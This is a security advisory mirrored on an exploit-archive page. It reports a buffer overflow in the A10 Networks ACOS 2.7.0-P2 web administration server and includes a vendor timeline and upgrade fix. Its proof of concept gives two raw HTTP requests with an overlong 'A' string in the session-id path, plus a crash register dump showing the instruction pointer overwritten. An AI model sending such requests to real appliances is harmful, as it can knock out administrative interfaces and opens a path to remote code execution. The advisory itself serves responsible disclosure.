exploit the possibilities

A10 Networks ACOS 2.7.0-P2 Buffer Overflow

A10 Networks ACOS 2.7.0-P2 Buffer Overflow
Posted Apr 2, 2014
Authored by Francisco Perna

A10 Networks ACOS version 2.7.0-P2 suffers from a buffer overflow vulnerability.

tags | exploit, overflow
MD5 | cb742e987658f3a83030d4bdcce46e01

A10 Networks ACOS 2.7.0-P2 Buffer Overflow

Change Mirror Download

-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

=== Details ===

Advisory:
http://www.quantumleap.it/a10-networks-remote-buffer-overflow-softax/
Affected Product: ACOS
Version: 2.7.0-P2(build: 53) (older versions may be affected too)
(Tested on SoftAX[2])

=== Executive Summary ===

Using a specially crafted HTTP request to the administration web server,
it is possible to exploit a lack in the user input validation.
Successful exploitation of the vulnerability may result in remote code
execution. Unsuccessful exploitation of the vulnerability may result in
a Denial of Service of the administrative interface.

=== Proof of Concept ===

Submitting arbitrary input in the HTTP request it?s possible to cause a
buffer overflow. If you provide an overly long ?session id? in the
request, the web server crashes. To reproduce the crash you can send one
of the following requests to the web server:

<HTTPREQ1>
GET
/US/AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA/sys_reboot.html
HTTP/1.1
Host: 192.168.1.210
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:20.0) Gecko/20100101
Firefox/20.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: it-IT,it;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Connection: keep-alive
</HTTPREQ1>

<HTTPREQ2>
GET
/US/AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA/sys_reboot.html
HTTP/1.1
Host: 192.168.1.210
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:20.0) Gecko/20100101
Firefox/20.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: it-IT,it;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Connection: keep-alive
<HTTPREQ2>

Once the crash occurs the following is the registers state of the SoftAX
appliance:

<REGSTATE>
rax 0×0 0
rbx 0x1e30300 31654656
rcx 0×6 6
rdx 0xffffffff 4294967295
rsi 0xcac18f12 3401682706
rdi 0×4141414141414141 4702111234474983745
rbp 0×4141414141414141 0×4141414141414141
rsp 0x7fffbdf9b400 0x7fffbdf9b400
r8 0×2000 8192
r9 0×20 32
r10 0×0 0
r11 0x7f10b4cec180 139709729653120
r12 0×0 0
r13 0x1e30318 31654680
r14 0x1e30300 31654656
r15 0x1e33b58 31669080
rip 0×524149 0×524149
eflags 0×10246 [ PF ZF IF RF ]
cs 0×33 51
ss 0x2b 43
ds 0×0 0
es 0×0 0
fs 0×0 0
gs 0×0 0
fctrl 0x37f 895
fstat 0×0 0
ftag 0xffff 65535
fiseg 0×0 0
fioff 0×0 0
foseg 0×0 0
fooff 0×0 0
fop 0×0 0
mxcsr 0x1f80 [ IM DM ZM OM UM PM ]
</REGSTATE>

=== Solution ===

To fix the A10 Networks remote Buffer Overflow you have to upgrade at
least to version 2.7.0-p6

=== Disclosure Timeline ===

2013-05-11 ? A10 Networks remote Buffer Overflow discovered
2013-05-28 ? Initial vendor notification
2013-05-30 ? The vendor acknowledge the vulnerability (bug 128069 )
2014-03-28 ? The vendor fixed the vulnerability[3]
2014-04-02 ? Public advisory

=== Discovered by ===

Vulnerability discovered by Francesco Perna of Quantum Leap s.r.l

=== References ===

[1] http://www.a10networks.com/about/technology_platform_acos.php
[2] http://www.a10networks.com/glossary/SoftAX.php
[3]
https://www.a10networks.com/support-axseries/downloads/AX_Series_270-P6_RelNotes_20140328.pdf

- --
Francesco Perna
Quantum Leap SRL
Sede Legale: Via Colle Scorrano n.5 65100 Pescara (PE)
Sede Operativa: Circonvallazione Cornelia n. 125, 00165 Roma (RM)
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v2.0.17 (MingW32)
Comment: Using GnuPG with Thunderbird - http://www.enigmail.net/

iQEcBAEBAgAGBQJTO7mWAAoJEPBLO12s/SuDKi8H/A+X4zIfkcwID4zTtbx7unnD
m48/DAVNQpVLBEAWYnu7a4I98FO4gtbHn2OkQOF5beweK6uDLQMbxrzbkufgisik
o10n8xbsa72GsPwadNxpMEtbLozmcjH5lyXPasfQ3OZkaxptesJJbTOGGoDx5M7t
Py0X+iBkoqqCZO5wlvWsFg2cwgjw5hexXsj4qPTEPrsILvU1bhRO46Ky7Zf1roZ+
jtSK9WyMAtiEnpW9N/srjl71vmu9T8Bkpg8iaffq6De7DKbB0aF8x6Jx9EwAkbI5
M8dBDIve6mbwjlWIBmvMBQxiVuXUSUNf0G6gwq++i0bPn/11m1C1XkODsJXJHhk=
=9BkH
-----END PGP SIGNATURE-----



Login or Register to add favorites

File Archive:

August 2020

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Aug 1st
    3 Files
  • 2
    Aug 2nd
    2 Files
  • 3
    Aug 3rd
    32 Files
  • 4
    Aug 4th
    22 Files
  • 5
    Aug 5th
    15 Files
  • 6
    Aug 6th
    19 Files
  • 7
    Aug 7th
    6 Files
  • 8
    Aug 8th
    1 Files
  • 9
    Aug 9th
    2 Files
  • 10
    Aug 10th
    27 Files
  • 11
    Aug 11th
    11 Files
  • 12
    Aug 12th
    11 Files
  • 13
    Aug 13th
    17 Files
  • 14
    Aug 14th
    0 Files
  • 15
    Aug 15th
    0 Files
  • 16
    Aug 16th
    0 Files
  • 17
    Aug 17th
    0 Files
  • 18
    Aug 18th
    0 Files
  • 19
    Aug 19th
    0 Files
  • 20
    Aug 20th
    0 Files
  • 21
    Aug 21st
    0 Files
  • 22
    Aug 22nd
    0 Files
  • 23
    Aug 23rd
    0 Files
  • 24
    Aug 24th
    0 Files
  • 25
    Aug 25th
    0 Files
  • 26
    Aug 26th
    0 Files
  • 27
    Aug 27th
    0 Files
  • 28
    Aug 28th
    0 Files
  • 29
    Aug 29th
    0 Files
  • 30
    Aug 30th
    0 Files
  • 31
    Aug 31st
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2020 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close